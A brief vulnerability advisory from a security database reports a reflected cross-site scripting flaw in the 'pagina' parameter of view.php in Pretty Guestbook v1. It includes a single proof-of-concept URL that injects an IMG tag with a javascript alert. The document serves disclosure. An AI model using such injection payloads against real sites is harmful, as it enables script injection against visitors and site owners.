Pretty Guestbook v1

2006-05-27T00:00:00
ID SECURITYVULNS:DOC:12858
Type securityvulns
Reporter Securityvulns
Modified 2006-05-27T00:00:00

Description

Homepage: http://www.tuttophp.altervista.org/main.php

Description: Text-based guestbook with the following features: - Data storing on text file - Paging of messages on screen - Blockage of messages with words too long into - Blockage of messages with both html tags(<>) - Validity-checking of email address

Effected files: view.php

XSS achived by URL Injection of pagina variable:

http://www.example.com/prettyguest-ing/view.php?pagina=1<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>